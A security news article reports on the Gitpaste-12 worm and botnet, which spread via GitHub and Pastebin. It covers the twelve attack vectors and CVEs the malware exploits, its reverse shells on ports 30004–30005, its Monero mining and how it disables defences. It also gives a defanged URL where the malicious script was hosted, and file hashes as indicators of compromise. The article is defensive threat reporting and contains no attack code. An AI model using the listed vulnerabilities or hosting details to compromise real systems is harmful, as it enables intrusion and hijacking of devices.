Reverse shell botnet Gitpaste-12 spreads via GitHub and Pastebin

by chebbi abir

A newly discovered worm and botnet named Gitpaste-12 lives on GitHub and also uses Pastebin to host malicious code.

The advanced malware comes equipped with reverse shell and crypto-mining capabilities and exploits over 12 known vulnerabilities, therefore the moniker.

Spreads via GitHub, attacks in 12 different ways

Gitpaste-12 was first detected by Juniper Threat Labs lurking on GitHub around October 15th.

However, commits reveal the malware has lived on GitHub since Jul 9th, 2020 until it was taken down on Oct 30th, 2020.

The worm attempts to crack passwords via brute-force and exploits known vulnerabilities on the systems it infects.

11 of these vulnerabilities are as follows, with the 12th one stemming from a Telnet brute force application used to spread Gitpaste-12:

CVE-2017-14135 Webadmin plugin for opendreambox
CVE-2020-24217 HiSilicon based IPTV/H.264/H.265 video encoders
CVE-2017-5638 Apache Struts
CVE-2020-10987 Tenda router
CVE-2014-8361 Miniigd SOAP service in Realtek SDK
CVE-2020-15893 UPnP in dlink routers
CVE-2013-5948 Asus routers
EDB-ID: 48225 Netlink GPON Router
EDB-ID: 40500 AVTECH IP Camera
CVE-2019-10758 MongoDB
CVE-2017-17215 (Huawei router)

After the initial system compromise, Gitpaste-12 downloads a recursive script from a Pastebin URL which instructs the infected host to keep executing this very script every minute.

This is a way for the malware to keep updating itself from the Command and Control (C2) source which is merely a paste URL:

gitpaste-12 pastebin
Gitpaste-12 initial payload on a pastebin URL which has since been removed
Source: Juniper

Further, the malware downloads the main shell script from GitHub.

The URL where the shell script had lived has since been taken down: https://raw.githubusercontent[.]com/cnmnmsl-001/-/master/shadu1

“The malware begins by preparing the environment. This means stripping the system of its defenses, including firewall rules, selinuxapparmor, as well as common attack prevention and monitoring software,” state Juniper Threat Labs researchers Alex Burt and Trevor Pott.

gitpaste-12 malware payload shell script
Gitpaste-12 main shell script that begins attacking a host’s defenses such as firewalls

In fact, some of the commands and hostnames present in the script reveal Gitpaste-12 is designed to attack cloud computing infrastructure provided by Alibaba Cloud and Tencent.

Additionally, the botnet is equipped with a Monero (XMR) cryptocurrency miner. 

But there’s more: the worm spreads itself by targeting a list of randomly generated IP addresses within a subnet range. 

“The Gitpaste-12 malware also contains a script that launches attacks against other machines, in an attempt to replicate and spread. It chooses a random /8 CIDR for attack and will try all addresses within that range,” state Juniper’s researchers.

The researchers additionally noted some compromised systems had TCP ports 30004 and 30005 open for receiving commands via reverse shells.

Gitpaste-12 has a low detection rate

Considering the recency of its discovery, some files associated with the Gitpaste-12 botnet have quite a low detection rate.

At the time of writing, BleepingComputer observed the payload which aids Gitpaste-12 in evading detection was itself undetectable by over 93% antivirus engines.

gitpaste 12 low detection rate
Gitpaste-12 payload has a very low detection rate

Similarly, the crypto miner configuration file and the shell script have not yet been flagged by any antivirus engine listed on VirusTotal, as observed by BleepingComputer:

gitpaste 12 zero detection rate
Some files have a zero detection rate thus far
​​​​​​Source: VirusTotal

Juniper’s report on a sophisticated malware present on GitHub follows shortly after Octopus Scanner had been discovered infiltrating over 26 open-source GitHub projects.

And attacks leveraging the open-source ecosystem are only expected to grow further, given their ongoing development.

“There is evidence of test code for possible future modules, indicating ongoing development for this malware. For now, however, targets are Linux based x86 servers, as well as Linux ARM and MIPS based IoT devices,” stated the report released by Juniper Threat Labs. 

Gitpaste-12 Indicators of Compromise (IOCs) as provided below, and Juniper’s detailed research can be found in their report. 

Miner: e67f78c479857ed8c562e576dcc9a8471c5f1ab4c00bb557b1b9c2d9284b8af9 ed4868ba445469abfa3cfc6c70e8fdd36a4345c21a3f451c7b65d6041fb8492b
Miner config: bd5e9fd8215f80ca49c142383ba7dbf7e24aaf895ae25af96bdab89c0bdcc3f1
Shell script: 5d1705f02cde12c27b85a0104cd76a39994733a75fa6e1e5b014565ad63e7bc3

To read the original article:


Interdit de copier  ce contenu